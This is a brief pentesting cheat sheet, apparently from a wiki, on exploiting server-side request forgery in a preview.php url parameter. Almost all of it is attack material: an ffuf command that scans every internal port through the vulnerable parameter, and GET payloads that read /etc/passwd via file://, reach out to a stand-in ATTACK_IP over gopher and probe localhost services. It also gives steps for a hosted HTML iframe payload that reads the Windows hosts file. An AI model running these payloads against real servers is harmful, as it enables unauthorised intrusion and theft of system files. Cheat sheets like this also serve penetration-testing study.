SSRF
Scan Internal Ports
ffuf -u 'http://TARGET_IP/preview.php?url=http://127.0.0.1:FUZZ/' -w <(seq 1 65535) -mc all -t 100 -fs 0GET requests
http://TARGET_IP/preview.php?url=file:///etc/passwdhttp://TARGET_IP/preview.php?url=gopher://ATTACK_IP/testhttp://TARGET_IP/preview.php?url=http://127.0.0.1:10000HTML content parser
1) Create an HTML file with this content
<iframe src="C:/Windows/system32/drivers/etc/hosts" height=1000 width=1000 />If the server uses PHP, you can create an index.php file instead with this content
2) Host it on an HTTP server
3) Exploit SSRF
Last updated